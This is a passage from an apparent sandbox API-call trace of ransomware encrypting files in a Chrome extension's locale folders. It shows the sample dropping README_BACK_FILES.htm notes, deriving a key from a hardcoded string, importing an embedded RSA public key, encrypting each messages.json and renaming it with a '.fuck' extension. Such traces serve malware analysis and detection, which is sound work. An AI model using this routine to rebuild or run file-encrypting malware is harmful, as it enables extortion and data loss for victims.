Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_US\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_us\\readme_back_files.htm")) returned 0xffffffff [0250.175] AreFileApisANSI () returned 1 [0250.175] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3310, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 157 [0250.175] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_US\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_us\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0250.176] GetFileType (hFile=0x5d54) returned 0x1 [0250.176] WriteFile (in: hFile=0x5d54, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0250.177] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0250.177] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x28e88b8 [0250.178] FindNextFileA (in: hFindFile=0x28e88b8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0250.179] FindNextFileA (in: hFindFile=0x28e88b8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0250.179] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0250.179] GetLastError () returned 0x0 [0250.179] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\messages.json")) returned 0x20 [0250.179] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\messages.json", dwFileAttributes=0x80) returned 1 [0250.180] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0250.180] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0250.182] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0250.182] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2940538) returned 1 [0250.185] CryptCreateHash (in: hProv=0x2940538, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0250.185] lstrlenA (lpString="dKFUHQAZHTBtFXQUaXBopKFNzMlQm") returned 29 [0250.185] CryptHashData (hHash=0x28e8078, pbData=0x28cb620, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0250.185] CryptDeriveKey (in: hProv=0x2940538, Algid=0x6610, hBaseData=0x28e8078, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2938978) returned 1 [0250.185] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----h", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0250.185] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0250.185] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2939c08) returned 1 [0250.185] CryptImportPublicKeyInfo (in: hCryptProv=0x2939c08, dwCertEncodingType=0x1, pInfo=0x2934670*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x29346a0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x29346a8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2937d78) returned 1 [0250.185] CryptEncrypt (in: hKey=0x2937d78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0250.186] CryptEncrypt (in: hKey=0x2937d78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2939410*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2939410*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0250.186] WriteFile (in: hFile=0x5d58, lpBuffer=0x2939410*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2939410*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0250.187] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0x103, lpOverlapped=0x0) returned 1 [0250.189] CryptEncrypt (in: hKey=0x2938978, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x103, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x110) returned 1 [0250.189] WriteFile (in: hFile=0x5d58, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x110, lpOverlapped=0x0) returned 1 [0250.189] CloseHandle (hObject=0x5d5c) returned 1 [0250.189] CloseHandle (hObject=0x5d58) returned 1 [0250.189] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\messages.json"), bFailIfExists=0) returned 1 [0250.193] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\messages.json", dwFileAttributes=0x0) returned 1 [0250.194] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\messages.json.gsg")) returned 1 [0250.196] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\messages.json.fuck")) returned 1 [0250.197] CryptDestroyHash (hHash=0x28e8078) returned 1 [0250.197] CryptDestroyKey (hKey=0x2938978) returned 1 [0250.197] CryptReleaseContext (hProv=0x2940538, dwFlags=0x0) returned 1 [0250.197] FindNextFileA (in: hFindFile=0x28e88b8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0250.197] FindClose (in: hFindFile=0x28e88b8 | out: hFindFile=0x28e88b8) returned 1 [0250.197] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\readme_back_files.htm")) returned 0xffffffff [0250.197] AreFileApisANSI () returned 1 [0250.197] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 154 [0250.197] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0250.198] GetFileType (hFile=0x5d54) returned 0x1 [0250.198] WriteFile (in: hFile=0x5d54, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0250.200] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0250.200] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2938978 [0250.201] FindNextFileA (in: hFindFile=0x2938978, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0250.201] FindNextFileA (in: hFindFile=0x2938978, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0250.201] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0250.201] GetLastError () returned 0x0 [0250.201] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\messages.json")) returned 0x20 [0250.202] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\messages.json", dwFileAttributes=0x80) returned 1 [0250.202] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0250.203] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0250.203] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0250.204] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2940538) returned 1 [0250.207] CryptCreateHash (in: hProv=0x2940538, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0250.207] lstrlenA (lpString="dKFUHQAZHTBtFXQUaXBopKFNzMlQm") returned 29 [0250.207] CryptHashData (hHash=0x28e7df8, pbData=0x28cb3a0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0250.207] CryptDeriveKey (in: hProv=0x2940538, Algid=0x6610, hBaseData=0x28e7df8, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x28e8078) returned 1 [0250.207] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----h", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0250.207] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0250.207] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2939058) returned 1 [0250.208] CryptImportPublicKeyInfo (in: hCryptProv=0x2939058, dwCertEncodingType=0x1, pInfo=0x29344d0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2934500*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2934508*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x28bf1d8) returned 1 [0250.208] CryptEncrypt (in: hKey=0x28bf1d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0250.208] CryptEncrypt (in: hKey=0x28bf1d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2939498*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2939498*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0250.208] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2939498*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2939498*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0250.209] ReadFile (in: hFile=0x5d58, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0x103, lpOverlapped=0x0) returned 1 [0250.212] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x103, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x110) returned 1 [0250.212] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x110, lpOverlapped=0x0) returned 1 [0250.212] CloseHandle (hObject=0x5d58) returned 1 [0250.212] CloseHandle (hObject=0x5d5c) returned 1 [0250.212] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\messages.json"), bFailIfExists=0) returned 1 [0250.215] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\messages.json", dwFileAttributes=0x0) returned 1 [0250.216] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\messages.json.gsg")) returned 1 [0250.217] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\messages.json.fuck")) returned 1 [0250.219] CryptDestroyHash (hHash=0x28e7df8) returned 1 [0250.219] CryptDestroyKey (hKey=0x28e8078) returned 1 [0250.219] CryptReleaseContext (hProv=0x2940538, dwFlags=0x0) returned 1 [0250.219] FindNextFileA (in: hFindFile=0x2938978, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0250.219] FindClose (in: hFindFile=0x2938978 | out: hFindFile=0x2938978) returned 1 [0250.219] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\readme_back_files.htm")) returned 0xffffffff [0250.219] AreFileApisANSI () returned 1 [0250.219] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 158 [0250.219] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0250.220] GetFileType (hFile=0x5d54) returned 0x1 [0250.220] WriteFile (in: hFile=0x5d54, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0250.222] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0250.222] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2938978 [0250.222] FindNextFileA (in: hFindFile=0x2938978, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0250.222] FindNextFileA (in: hFindFile=0x2938978, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0250.222] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0250.222] GetLastError () returned 0x0 [0250.222] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\messages.json")) returned 0x20 [0250.223] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\messages.json", dwFileAttributes=0x80) returned 1 [0250.223] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0250.224] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0250.226] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User 